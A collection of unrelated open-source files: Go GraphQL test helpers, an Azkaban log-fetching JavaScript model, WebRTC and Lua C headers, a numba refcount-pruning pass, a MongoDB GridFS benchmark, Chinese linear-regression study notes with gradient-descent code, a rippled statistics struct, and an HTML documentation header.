				failed
				pending
				unknown
			}
		}
		serviceBindingUsages {
			name
			namespace
			usedBy {
				kind
				name
			}
		}
	`
}

// instanceEventDetailsFields wraps instanceDetailsFields in the subscription
// event envelope (event type + instance payload).
func instanceEventDetailsFields() string {
	return fmt.Sprintf(`
		type
		serviceInstance {
			%s
		}
	`, instanceDetailsFields())
}
// checkInstanceFromClusterServiceClass compares the identity fields of an
// instance backed by a cluster-scoped service class.
func checkInstanceFromClusterServiceClass(t *testing.T, expected, actual shared.ServiceInstance) {
	// Name
	assert.Equal(t, expected.Name, actual.Name)

	// Namespace
	assert.Equal(t, expected.Namespace, actual.Namespace)

	// ClusterServicePlan.Name
	assert.Equal(t, expected.ClusterServicePlan.Name, actual.ClusterServicePlan.Name)

	// ClusterServiceClass.Name
	assert.Equal(t, expected.ClusterServiceClass.Name, actual.ClusterServiceClass.Name)

	assert.Equal(t, expected.Labels, actual.Labels)
	assert.Equal(t, expected.Bindable, actual.Bindable)
}

// checkInstanceFromServiceClass compares the identity fields of an instance
// backed by a namespaced service class.
// NOTE(review): unlike the cluster variant, this does not compare
// Labels/Bindable — confirm whether that asymmetry is intentional.
func checkInstanceFromServiceClass(t *testing.T, expected, actual shared.ServiceInstance) {
	// Name
	assert.Equal(t, expected.Name, actual.Name)

	// Namespace
	assert.Equal(t, expected.Namespace, actual.Namespace)

	// ServicePlan.Name
	assert.Equal(t, expected.ServicePlan.Name, actual.ServicePlan.Name)

	// ServiceClass.Name
	assert.Equal(t, expected.ServiceClass.Name, actual.ServiceClass.Name)

	// ServiceClass.Namespace
	assert.Equal(t, expected.ServiceClass.Namespace, actual.ServiceClass.Namespace)
}
// assertInstanceFromClusterServiceClassExistsAndEqual fails the test unless
// arr contains an instance with the expected name; the match is then compared
// field-by-field with checkInstanceFromClusterServiceClass.
func assertInstanceFromClusterServiceClassExistsAndEqual(t *testing.T, expectedElement shared.ServiceInstance, arr []shared.ServiceInstance) {
	assert.Condition(t, func() (success bool) {
		for _, v := range arr {
			if v.Name == expectedElement.Name {
				checkInstanceFromClusterServiceClass(t, expectedElement, v)
				return true
			}
		}
		return false
	}, "Resource does not exist")
}

// assertInstanceFromServiceClassExistsAndEqual is the namespaced-class
// counterpart of the assertion above.
func assertInstanceFromServiceClassExistsAndEqual(t *testing.T, expectedElement shared.ServiceInstance, arr []shared.ServiceInstance) {
	assert.Condition(t, func() (success bool) {
		for _, v := range arr {
			if v.Name == expectedElement.Name {
				checkInstanceFromServiceClass(t, expectedElement, v)
				return true
			}
		}
		return false
	}, "Resource does not exist")
}
// instanceEvent builds the expected subscription event payload for the given
// event type and instance.
func instanceEvent(eventType string, serviceInstance shared.ServiceInstance) ServiceInstanceEvent {
	var event ServiceInstanceEvent
	event.Type = eventType
	event.ServiceInstance = serviceInstance
	return event
}
// readInstanceEvent blocks until the subscription delivers the next event (or
// the default timeout elapses) and unwraps the serviceInstanceEvent payload.
func readInstanceEvent(sub *graphql.Subscription) (ServiceInstanceEvent, error) {
	var payload struct {
		ServiceInstanceEvent ServiceInstanceEvent
	}
	err := sub.Next(&payload, tester.DefaultSubscriptionTimeout)
	return payload.ServiceInstanceEvent, err
}
// checkInstanceEvent compares only the event type and instance name — the
// full instance payload is validated separately by the check* helpers.
func checkInstanceEvent(t *testing.T, expected, actual ServiceInstanceEvent) {
	assert.Equal(t, expected.Type, actual.Type)
	assert.Equal(t, expected.ServiceInstance.Name, actual.ServiceInstance.Name)
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2014 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
// Create (or extend) the global `azkaban` namespace object.
$.namespace('azkaban');

/**
 * Backbone model that incrementally fetches the execution log of a job.
 *
 * Attributes:
 *   offset  - offset of the next log chunk to request from the server.
 *   logData - concatenation of all chunks received so far.
 *
 * NOTE(review): relies on the globals `contextURL`, `execId`, `jobId` and
 * `attempt` being defined by the enclosing page — confirm before reuse.
 */
azkaban.JobLogModel = Backbone.Model.extend({
  initialize: function () {
    this.set("offset", 0);
    this.set("logData", "");
  },

  /**
   * Requests the next chunk (up to 50000 units) of the job log via AJAX,
   * appends it to `logData`, and keeps requesting recursively until the
   * server returns an empty chunk.
   */
  refresh: function () {
    var requestURL = contextURL + "/executor";
    var requestData = {
      "execid": execId,
      "jobId": jobId,
      "ajax": "fetchExecJobLogs",
      "offset": this.get("offset"),
      "length": 50000,
      "attempt": attempt
    };
    var self = this;
    var successHandler = function (data) {
      console.log("fetchLogs " + data.offset);
      if (data.error) {
        console.log(data.error);
      }
      else {
        // Advance past the chunk just received and accumulate its text.
        self.set("offset", data.offset + data.length);
        self.set("logData", self.get("logData") + data.data);
        if (data.length != 0) {
          // There may be more data available so request the next chunk
          self.refresh();
        }
      }
    };
    $.ajax({
      url: requestURL,
      type: "get",
      data: requestData,
      dataType: "json",
      error: function (data) {
        console.log(data);
      },
      success: successHandler
    });
  },
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2013 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
// This file contains the interface for MediaConstraints, corresponding to
// the definition at
// http://www.w3.org/TR/mediacapture-streams/#mediastreamconstraints and also
// used in WebRTC: http://dev.w3.org/2011/webrtc/editor/webrtc.html#constraints.
// This interface is being deprecated in Chrome, and may be removed
// from WebRTC too.
// https://bugs.chromium.org/p/webrtc/issues/detail?id=5617
#ifndef WEBRTC_API_MEDIACONSTRAINTSINTERFACE_H_
#define WEBRTC_API_MEDIACONSTRAINTSINTERFACE_H_
#include <string>
#include <vector>
#include "webrtc/base/optional.h"
#include "webrtc/api/peerconnectioninterface.h"
namespace webrtc {
// MediaConstraintsInterface
// Interface used for passing arguments about media constraints
// to the MediaStream and PeerConnection implementation.
// MediaConstraintsInterface
// Interface used for passing arguments about media constraints
// to the MediaStream and PeerConnection implementation.
class MediaConstraintsInterface {
 public:
  // One key/value constraint pair, e.g. ("maxWidth", "1280").
  struct Constraint {
    Constraint() {}
    // NOTE: `value` is now taken by const reference. The previous signature
    // took it as `const std::string` by value, which made a redundant copy
    // (and the const qualifier also ruled out moving it into the member).
    Constraint(const std::string& key, const std::string& value)
        : key(key), value(value) {
    }
    std::string key;
    std::string value;
  };

  // Ordered list of constraints; lookup is linear, first match wins.
  class Constraints : public std::vector<Constraint> {
   public:
    // Finds the first constraint whose key equals `key`; presumably writes
    // its value into `*value` and returns true on success (defined in the
    // accompanying .cc file — confirm there).
    bool FindFirst(const std::string& key, std::string* value) const;
  };

  // Constraints that must be satisfied vs. those that are best-effort.
  virtual const Constraints& GetMandatory() const = 0;
  virtual const Constraints& GetOptional() const = 0;

  // Constraint keys used by a local video source.
  // Specified by draft-alvestrand-constraints-resolution-00b
  static const char kMinAspectRatio[];  // minAspectRatio
  static const char kMaxAspectRatio[];  // maxAspectRatio
  static const char kMaxWidth[];  // maxWidth
  static const char kMinWidth[];  // minWidth
  static const char kMaxHeight[];  // maxHeight
  static const char kMinHeight[];  // minHeight
  static const char kMaxFrameRate[];  // maxFrameRate
  static const char kMinFrameRate[];  // minFrameRate

  // Constraint keys used by a local audio source.
  static const char kEchoCancellation[];  // echoCancellation

  // These keys are google specific.
  static const char kGoogEchoCancellation[];  // googEchoCancellation
  static const char kExtendedFilterEchoCancellation[];  // googEchoCancellation2
  static const char kDAEchoCancellation[];  // googDAEchoCancellation
  static const char kAutoGainControl[];  // googAutoGainControl
  static const char kExperimentalAutoGainControl[];  // googAutoGainControl2
  static const char kNoiseSuppression[];  // googNoiseSuppression
  static const char kExperimentalNoiseSuppression[];  // googNoiseSuppression2
  static const char kIntelligibilityEnhancer[];  // intelligibilityEnhancer
  static const char kHighpassFilter[];  // googHighpassFilter
  static const char kTypingNoiseDetection[];  // googTypingNoiseDetection
  static const char kAudioMirroring[];  // googAudioMirroring

  // Google-specific constraint keys for a local video source
  static const char kNoiseReduction[];  // googNoiseReduction

  // Constraint keys for CreateOffer / CreateAnswer
  // Specified by the W3C PeerConnection spec
  static const char kOfferToReceiveVideo[];  // OfferToReceiveVideo
  static const char kOfferToReceiveAudio[];  // OfferToReceiveAudio
  static const char kVoiceActivityDetection[];  // VoiceActivityDetection
  static const char kIceRestart[];  // IceRestart
  // These keys are google specific.
  static const char kUseRtpMux[];  // googUseRtpMUX

  // Constraints values.
  static const char kValueTrue[];  // true
  static const char kValueFalse[];  // false

  // PeerConnection constraint keys.
  // Temporary pseudo-constraints used to enable DTLS-SRTP
  static const char kEnableDtlsSrtp[];  // Enable DTLS-SRTP
  // Temporary pseudo-constraints used to enable DataChannels
  static const char kEnableRtpDataChannels[];  // Enable RTP DataChannels
  // Google-specific constraint keys.
  // Temporary pseudo-constraint for enabling DSCP through JS.
  static const char kEnableDscp[];  // googDscp
  // Constraint to enable IPv6 through JS.
  static const char kEnableIPv6[];  // googIPv6
  // Temporary constraint to enable suspend below min bitrate feature.
  static const char kEnableVideoSuspendBelowMinBitrate[];
  // googSuspendBelowMinBitrate
  // Constraint to enable combined audio+video bandwidth estimation.
  static const char kCombinedAudioVideoBwe[];  // googCombinedAudioVideoBwe
  static const char kScreencastMinBitrate[];  // googScreencastMinBitrate
  static const char kCpuOveruseDetection[];  // googCpuOveruseDetection
  static const char kPayloadPadding[];  // googPayloadPadding

  // The prefix of internal-only constraints whose JS set values should be
  // stripped by Chrome before passed down to Libjingle.
  static const char kInternalConstraintPrefix[];

 protected:
  // Dtor protected as objects shouldn't be deleted via this interface
  virtual ~MediaConstraintsInterface() {}
};
// Looks up `key` in `constraints` and, on success, parses its value as a
// boolean into `*value`.  `mandatory_constraints`, when non-null, is
// presumably incremented when the match came from the mandatory set —
// confirm against the implementation in the .cc file.  Returns whether the
// key was found and parsed.
bool FindConstraint(const MediaConstraintsInterface* constraints,
const std::string& key, bool* value,
size_t* mandatory_constraints);
// Overload of the above that parses the value as an integer.
bool FindConstraint(const MediaConstraintsInterface* constraints,
const std::string& key,
int* value,
size_t* mandatory_constraints);
// Copy all relevant constraints into an RTCConfiguration object.
void CopyConstraintsIntoRtcConfiguration(
const MediaConstraintsInterface* constraints,
PeerConnectionInterface::RTCConfiguration* configuration);
} // namespace webrtc
#endif // WEBRTC_API_MEDIACONSTRAINTSINTERFACE_H_
| {
"pile_set_name": "Github"
} |
"""
Implement a rewrite pass on LLVM module to remove unnecessary refcount
operation.
"""
from __future__ import absolute_import, print_function
from llvmlite.ir.transforms import CallVisitor
from numba import types
class _MarkNrtCallVisitor(CallVisitor):
    """
    Visitor that collects every call instruction targeting the NRT
    refcount primitives NRT_incref / NRT_decref.
    """
    def __init__(self):
        # Call instructions identified as NRT refcount operations.
        self.marked = set()

    def visit_Call(self, instr):
        callee_name = getattr(instr.callee, 'name', '')
        if callee_name in ('NRT_incref', 'NRT_decref'):
            self.marked.add(instr)
def _rewrite_function(function):
    """Delete every NRT_incref/NRT_decref call instruction in *function*."""
    # First pass: identify the refcount instructions.
    visitor = _MarkNrtCallVisitor()
    visitor.visit_Function(function)
    to_remove = visitor.marked
    # Second pass: strip them block by block.  Iterate over a snapshot of
    # each instruction list since we mutate it while walking.
    for block in function.basic_blocks:
        for instruction in list(block.instructions):
            if instruction in to_remove:
                block.instructions.remove(instruction)
# The only NRT API functions tolerated in a function that is a candidate for
# refcount pruning; any other NRT_* reference (e.g. an allocator) makes the
# module illegal for the rewrite (see _legalize).
_accepted_nrtfns = 'NRT_incref', 'NRT_decref'
def _legalize(module, dmm, fndesc):
"""
Legalize the code in the module.
Returns True if the module is legal for the rewrite pass that remove
unnecessary refcount.
"""
def valid_output(ty):
"""
Valid output are any type that does not need refcount
"""
model = dmm[ty]
return not model.contains_nrt_meminfo()
def valid_input(ty):
"""
Valid input are any type that does not need refcount except Array.
"""
return valid_output(ty) or isinstance(ty, types.Array)
argtypes = fndesc.argtypes
restype = fndesc.restype
calltypes = fndesc.calltypes
# Legalize function arguments
for argty in argtypes:
if not valid_input(argty):
return False
# Legalize function return
if not valid_output(restype):
return False
# Legalize all called functions
for callty in calltypes.values():
if callty is not None and not valid_output(callty.return_type):
return False
# Ensure no allocation
for fn in module.functions:
if fn.name.startswith("NRT_"):
if fn.name not in _accepted_nrtfns:
return False
return True
def remove_unnecessary_nrt_usage(function, context, fndesc):
    """
    Remove unnecessary NRT incref/decref calls from *function* (an LLVM
    function), using high-level type information to prove NRT is not needed.

    A function qualifies when it does not:
    - return an array object;
    - take refcounted arguments other than arrays;
    - call anything that returns a refcounted object.

    Under those conditions it cannot capture or create references that
    extend the lifetime of any refcounted object beyond the lifetime of
    the function itself.  The rewrite is performed in place.

    Returns True when the rewrite was applied, False otherwise.
    """
    dmm = context.data_model_manager
    if not _legalize(function.module, dmm, fndesc):
        return False
    _rewrite_function(function)
    return True
| {
"pile_set_name": "Github"
} |
var Db = require('../../lib/mongodb').Db,
Server = require('../../lib/mongodb').Server,
ObjectID = require('../../lib/mongodb').ObjectID,
GridStore = require('../../lib/mongodb').GridStore;
var simulated_buffer = new Buffer(1024*1000*10).toString();
new Db('grid_fs_write_benchmark', new Server("127.0.0.1", 27017, {auto_reconnect: true}), {}).open(function(err, new_client) {
  new_client.dropDatabase(function(err, result) {
    new_client.close();
    // Run one write benchmark for the given index.  The index is passed as a
    // function parameter so each asynchronous `open` callback sees its own
    // value: the original code read the loop variable `i` directly inside
    // the callback, but with `var` scoping the loop has already finished by
    // the time the callback fires, so every file was named with the final
    // value of `i` (e.g. "foobar1" instead of "foobar0").
    var runBenchmark = function(index) {
      new Db('grid_fs_write_benchmark', new Server("127.0.0.1", 27017, {auto_reconnect: true}), {}).open(function(err, client) {
        var gridStore = new GridStore(client, "foobar" + index, "w");
        gridStore.open(function(err, gridStore) {
          gridStore.write(simulated_buffer.toString(), function(err, gridStore) {
            gridStore.close(function(err, result) {
              client.close();
            });
          });
        });
      });
    };
    for(var i = 0; i < 1; i++) {
      runBenchmark(i);
    }
  })
});
| {
"pile_set_name": "Github"
} |
/*
** $Id: ltm.h,v 2.22.1.1 2017/04/19 17:20:42 roberto Exp $
** Tag methods
** See Copyright Notice in lua.h
*/
#ifndef ltm_h
#define ltm_h
#include "lobject.h"
/*
* WARNING: if you change the order of this enumeration,
* grep "ORDER TM" and "ORDER OP"
*/
/* identifiers for all tag-method (metamethod) events; see WARNING above */
typedef enum {
  /* events up to TM_EQ are cached in a table's 'flags' field (see gfasttm) */
  TM_INDEX,
  TM_NEWINDEX,
  TM_GC,
  TM_MODE,
  TM_LEN,
  TM_EQ,  /* last tag method with fast access */
  /* arithmetic events */
  TM_ADD,
  TM_SUB,
  TM_MUL,
  TM_MOD,
  TM_POW,
  TM_DIV,
  TM_IDIV,
  /* bitwise events */
  TM_BAND,
  TM_BOR,
  TM_BXOR,
  TM_SHL,
  TM_SHR,
  /* unary events */
  TM_UNM,
  TM_BNOT,
  /* comparison events */
  TM_LT,
  TM_LE,
  /* miscellaneous events */
  TM_CONCAT,
  TM_CALL,
  TM_N /* number of elements in the enum */
} TMS;
/*
** gfasttm: fast lookup of tag method 'e' in metatable 'et'.  Returns NULL
** immediately when the metatable is absent or when the table's 'flags'
** bitfield records that the event has no handler; otherwise falls back to
** the real lookup via luaT_gettm.
*/
#define gfasttm(g,et,e) ((et) == NULL ? NULL : \
((et)->flags & (1u<<(e))) ? NULL : luaT_gettm(et, e, (g)->tmname[e]))

/* convenience form of gfasttm taking a lua_State instead of a global_State */
#define fasttm(l,et,e) gfasttm(G(l), et, e)

/* printable name for type tag 'x'; the +1 offsets the -1 tag (see lua.h) */
#define ttypename(x) luaT_typenames_[(x) + 1]
/* table of printable names for the basic Lua types, indexed via ttypename */
LUAI_DDEC const char *const luaT_typenames_[LUA_TOTALTAGS];

/* returns a printable name for the type of object 'o' */
LUAI_FUNC const char *luaT_objtypename (lua_State *L, const TValue *o);

/* raw lookup of tag method 'event' in metatable 'events' */
LUAI_FUNC const TValue *luaT_gettm (Table *events, TMS event, TString *ename);
/* lookup of tag method 'event' for object 'o' (via its metatable) */
LUAI_FUNC const TValue *luaT_gettmbyobj (lua_State *L, const TValue *o,
TMS event);
/* initializes the tag-method name strings — presumably called once at
** state creation; confirm in ltm.c */
LUAI_FUNC void luaT_init (lua_State *L);
/* calls tag method 'f' with p1/p2; 'hasres' selects whether p3 is an
** argument or a result slot — confirm exact protocol in ltm.c */
LUAI_FUNC void luaT_callTM (lua_State *L, const TValue *f, const TValue *p1,
const TValue *p2, TValue *p3, int hasres);
LUAI_FUNC int luaT_callbinTM (lua_State *L, const TValue *p1, const TValue *p2,
StkId res, TMS event);
LUAI_FUNC void luaT_trybinTM (lua_State *L, const TValue *p1, const TValue *p2,
StkId res, TMS event);
LUAI_FUNC int luaT_callorderTM (lua_State *L, const TValue *p1,
const TValue *p2, TMS event);
#endif
| {
"pile_set_name": "Github"
} |
## 李宏毅机器学习Day1-3:线性回归任务一
### 什么是机器学习?
机器学习的核心是“**使用算法解析数据,从中学习,然后对世界上的某件事情做出决定或预测**”。
Tom Mitchell提供了一个更现代的定义:"对于某类任务T和性能度量P,如果一个计算机程序在T上以P衡量的性能随着经验E而自我完善,那么我们就说这个程序从经验E中学习。"
示例:玩跳棋。
E =玩许多跳棋游戏的经验
T =玩跳棋的任务。
P =程序赢得下一场比赛的概率。
### 中心极限定理
中心极限定理指的是给定一个任意分布的总体。我每次从这些总体中随机抽取 n 个抽样,一共抽 m 次。 然后把这 m 组抽样分别求出平均值。 这些平均值的分布接近**正态分布**。
### 正态分布
#### 概率密度函数
在数学中,连续型随机变量的**概率密度函数**(Probability density function)是一个描述这个随机变量的输出值,在某个确定的取值点附近的可能性的函数。**累积分布函数**是概率密度函数的积分。
也叫高斯分布。其概率密度公式为:
$f(x)=\frac{1}{\sigma \sqrt{2 \pi}} e^{-\frac{(x-\mu)^{2}}{2 \sigma^{2}}}$
其中$u$为均值,$\sigma^{2}$为方差。
如果一个随机变量$X$服从这个分布,我们写作$X$~$N(\mu, \sigma^2)$, 如果$u=0$,且$\sigma=1$,则这个分布被称为**标准正态分布**。
下面是四个不同参数的概率密度函数:

### 最大似然估计
最大似然估计是一种确定模型参数值的方法,基于**最大似然原理**提出。确定参数值的过程,是找到能最大化模型产生真实观察数据可能性的那一组参数。
#### 最大似然原理
> 概率大的事件在一次观测中更容易发生。
> 在一次观测中发生了的事件其概率应该大。
举例:
>1. 某同学与一位猎人一起外出打猎。忽然,一只野兔从前方窜过,只听一声枪响,野兔应声倒下,请问:是谁击中了野兔?
>2. 事件A,发生的概率p只可能为0.1,0.3或0.6,在一次观测中,A发生了,请问:p为何值?
#### 计算最大似然估计
给定一个概率分布$ {\displaystyle D} $,已知其概率密度函数(连续分布)或概率质量函数(离散分布)为$ {\displaystyle f_{D}}$,以及一个分布参数 ${\displaystyle \theta }$,我们可以从这个分布中抽出一个具有$ n $个值的采样 ${\displaystyle X_{1},X_{2},\ldots ,X_{n}}$,利用 ${\displaystyle f_{D}}$计算出其似然函数:
${\displaystyle {\mbox{L}}(\theta \mid x_{1},\dots ,x_{n})=f_{\theta }(x_{1},\dots ,x_{n})} $
若$ {\displaystyle D} $是离散分布, ${\displaystyle f_{\theta }}$即是在参数为$ {\displaystyle \theta }$时观测到这一采样的概率。若其是连续分布, ${\displaystyle f_{\theta }}$ 则为 ${\displaystyle X_{1},X_{2},\ldots ,X_{n}}$联合分布的概率密度函数在观测值处的取值。从数学上来说,我们可以在${\displaystyle f_{\theta }}$ 的所有可能取值中寻找一个参数值使得似然函数取到最大值,这个参数值被称为最大似然估计(maximum likelihood estimates,MLE)。
步骤如下:
- **取对数**
- **求导数,得驻点,最大值点**
- **作结论**
#### 小结
##### **最大似然估计总是能精确地得到解吗?**
简单来说,不能。更有可能的是,在真实的场景中,对数似然函数的导数仍然是难以解析的(也就是说,很难甚至不可能人工对函数求微分)。因此,一般采用期望最大化(EM)算法等迭代方法为参数估计找到数值解,但总体思路还是一样的。
**什么时候最小二乘参数估计和最大似然估计结果相同?**
最小二乘法是另一种常用的机器学习模型参数估计方法。结果表明,当模型向上述例子中一样被假设为高斯分布时,MLE 的估计等价于最小二乘法。
对于最小二乘参数估计,我们想要找到最小化数据点和回归线之间距离平方之和的直线。在最大似然估计中,我们想要最大化数据同时出现的总概率。当待求分布被假设为高斯分布时,最大概率会在数据点接近平均值时找到。由于高斯分布是对称的,这等价于最小化数据点与平均值之间的距离。
### 推导回归Loss Function
**损失函数**(loss function)是用来估量你模型的预测值$f(x)$与真实值$Y$的不一致程度,损失函数越小,模型的鲁棒性就越好。这里我们使用均方误差(MSE)作为我们的损失函数。
定义:
$$
\begin{aligned}
L(w,b) & = \sum_{j=1}^{m}\left ( y^{(j)}- f(x^{(j)}) \right )^2,
其中 f(x)=b+\sum_{i=1}^{n} w_{i} x_{i},代入得到 \\
& = \sum_{j=1}^{m}\left(y^{(j)}-\left(b+\sum_{i=1}^{n} w_{i} x_{i}^{(j)}\right)\right)^{2}\\
\end{aligned}
$$
其中 $(x^{(j)},y^{(j)})$为 样本点,$m$为样本点计数,$x_i$为训练集特征值,$w_i$为权重,$b$为偏置值,$f(x)$为模型函数。
**注:本文里的损失函数其实是代价函数,这里没有一个公认的区别标准,别的说法里损失函数主要指的是对于单个样本的损失或误差,这里我们等同与代价函数,表示多样本误差的总和。**
### 损失函数与凸函数
在使用梯度下降进行最小化损失函数的时候,如果损失函数是凸函数,那么不管怎么初始化,总能找到全局最优解。否则,很有可能陷入局部最优解。
### 泰勒展开
泰勒展开是将一个在$x=x_0$处具有n阶导数的函数$f(x)$利用关于$(x-x0)$的n次多项式来逼近函数的方法。
设 n 是一个正整数。如果定义在一个包含 a 的区间上的函数 f 在 a 点处 n+1 次可导,那么对于这个区间上的任意 x,都有:
$f(x)=f(a)+\frac{f^{\prime}(a)}{1 !}(x-a)+\frac{f^{(2)}(a)}{2 !}(x-a)^{2}+\cdots+\frac{f^{(n)}(a)}{n !}(x-a)^{n}+R_{n}(x)$
表示$f^{(n)}(a)$ $f(x)$的n阶导数,等号后的多项式称为函数$f(x)$在$a$处的泰勒展开式,剩余的$R_n(x)$是泰勒公式的余项,是$(x-a)^n$的高阶无穷小。
### 推导梯度下降
梯度下降算法如下:
$θ_j:=θ_j−α\frac∂{∂θ_j}L(θ)$
$a$为学习率(步长)。
推导过程基于泰勒展开的一阶项:
$f(\theta)=f(\theta_0)+(\theta-\theta_0){\bigtriangledown}f(\theta_0)$
为了最小化函数,希望函数往使函数减小的方向变化,则有:
$(\theta-\theta_0){\bigtriangledown}f(\theta_0) < 0$,
其中 $(\theta-\theta_0)$ 是微小矢量,可表示为$a^{'}v$, $a^{'}$类似上面提到的学习率,为正值,取尽量小的值,$v$为该方向上的单位向量,
所有上面的不等式变成:
$v{\bigtriangledown}f(\theta_0) < 0$
然后根据两个向量乘积,我们知道两个向量方向相反可取向量乘积最小值,不难得:
$θ=θ_0−α{\bigtriangledown}f(\theta_0)$, $a$为$a^{'}$与${\bigtriangledown}f(\theta_0)$的模的乘积。
### 梯度下降代码实现
```python
"""
自己实现
梯度下降解决线性回归问题
"""
import numpy as np
import matplotlib.pyplot as plt
def costFunction(X, y, theta=[0, 0]):
"""
损失函数
"""
m = y.size
h = X.dot(theta)
J = 1.0 / (2 * m) * (np.sum(np.square(h - y)))
return J
def gradientDescent(X, y, theta=[0, 0], alpha=0.01, num_iters=1500):
"""
梯度下降
"""
m = y.size
J_history = np.zeros(num_iters)
for iter in np.arange(num_iters):
h = X.dot(theta)
theta = theta - alpha * (1.0 / m) * (X.T.dot(h - y))
J_history[iter] = costFunction(X, y, theta)
return (theta, J_history)
def MaxMinNormalization(x):
"""
归一化
"""
Min = np.min(x)
Max = np.max(x)
x = (x - Min) / (Max - Min)
return x
# 自己构造数据集
X_row = 100 * np.random.rand(100)
X = MaxMinNormalization(X_row)
y = 0.5*X + 2 + np.random.normal(0,0.01,(100,))
# 数据可视化
plt.subplot(1, 2, 1)
plt.scatter(X_row, y, color='black')
plt.xlabel('x')
plt.ylabel('y')
X = np.c_[np.ones((X.shape[0],1)), X]
# training set
X_train = X[:80]
y_train = y[:80]
# test set
X_test = X[80:]
y_test = y[80:]
b = 0
w = 0
lr = 0.01
iteration = 10000
# 画出每一次迭代和损失函数变化
theta , Cost_J = gradientDescent(X_train, y_train, theta=[b, w], alpha= lr, num_iters= iteration)
print('最终b, w结果: ',theta)
testCost = costFunction(X_test, y_test, theta)
print('测试集误差: ',testCost)
h = X.dot(theta)
plt.plot(X_row, h, "b--")
plt.subplot(1, 2, 2)
plt.plot(Cost_J)
plt.ylabel('Cost J')
plt.xlabel('Iterations')
plt.show()
```
结果如下:
```
最终b, w结果: [1.99788294 0.50547522]
测试集误差: 5.113037555609278e-05
```

### 学习L2-Norm,L1-Norm,L0-Norm
>范数是一种强化了的距离概念,它在定义上比距离多了一条数乘的运算法则。有时候为了便于理解,我们可以把范数当作距离来理解。
>
>L0范数是指向量中非0的元素的个数。
>
>L1范数是指向量中非零元素绝对值之和。
>
>L2范数是指向量各元素的平方和然后求平方根,L2范数通常会被用来做优化目标函数的正则化项,防止模型为了迎合训练集而过于复杂造成过拟合的情况,从而提高模型的泛化能力。
### 推导正则化公式
参考[L2正则化推导](<https://blog.csdn.net/winone361/article/details/82555283>)
### 为什么用L1-Norm代替L0-Norm
L0-Norm 优化的目标是使大多数参数为0,即W是稀疏的。但L0范数的优化问题是NP hard,且可证L1范数是L0范数的最优凸近似,因此通常使用L1范数来代替。
### 为什么正则化时只对w/Θ做限制,不对b做限制
模型的复杂程度是由w/θ决定的,b只是起到平移模型的作用。缩小b不能使模型简化,只能使模型分界面趋于靠近原点。相反,对w的限制可以实现对特征的惩罚,留取更重要的特征,惩罚不重要的特征权重,从而使Loss Function更平滑,提高泛化能力,防止过拟合。
------
参考:
[从最大似然估计开始,你需要打下的机器学习基石](<https://blog.csdn.net/tkkzc3E6s4Ou4/article/details/79016194>)
[L2正则化推导](<https://blog.csdn.net/winone361/article/details/82555283>) | {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
/*
This file is part of rippled: https://github.com/ripple/rippled
Copyright (c) 2012, 2013 Ripple Labs Inc.
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL , DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
//==============================================================================
#ifndef RIPPLE_VALIDATORS_COUNT_H_INCLUDED
#define RIPPLE_VALIDATORS_COUNT_H_INCLUDED
namespace ripple {
namespace Validators {
/** Measures Validator performance statistics. */
/** Measures Validator performance statistics. */
struct Count
{
    Count()
        : received (0)
        , expected (0)
        , closed (0)
    {
    }

    Count (std::size_t received_,
           std::size_t expected_,
           std::size_t closed_)
        : received (received_)
        , expected (expected_)
        , closed (closed_)
    {
    }

    /** Reset every counter back to zero. */
    void clear ()
    {
        *this = Count();
    }

    /** Returns the percentage of ledger participation. */
    int percent () const
    {
        int const denom (closed + expected);
        if (denom <= 0)
            return 0;
        return (closed * 100) / denom;
    }

    /** Returns the percentage of orphaned validations. */
    int percent_orphaned () const
    {
        int const denom (received + closed);
        if (denom <= 0)
            return 0;
        return (received * 100) / denom;
    }

    /** Output to PropertyStream. */
    void onWrite (beast::PropertyStream::Map& map)
    {
        map["received"] = received;
        map["expected"] = expected;
        map["closed"] = closed;
        map["percent"] = percent ();
        map["percent_orphan"] = percent_orphaned();
    }

    std::size_t received; // Count of validations without a closed ledger
    std::size_t expected; // Count of closed ledgers without a validation
    std::size_t closed;   // Number of validations with closed ledgers
};
/** Component-wise sum of two Count statistics. */
inline Count operator+ (Count const& lhs, Count const& rhs)
{
    std::size_t const r (lhs.received + rhs.received);
    std::size_t const e (lhs.expected + rhs.expected);
    std::size_t const c (lhs.closed + rhs.closed);
    return Count (r, e, c);
}
}
}
#endif
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!-- This comment will force IE7 to go into quirks mode. -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></meta>
<link rel="stylesheet" type="text/css" href="../../CSS/Contents.css"></link>
<script type="text/javascript" src="../../JS/Common.js"></script>
<title>Contract.RequiresException Constructor (string)</title>
</head>
<body>
<div id="Header">
<div id="ProjectTitle">Documentation Project</div>
<div id="PageTitle">Contract.RequiresException Constructor (string)</div>
<div id="HeaderShortcuts">
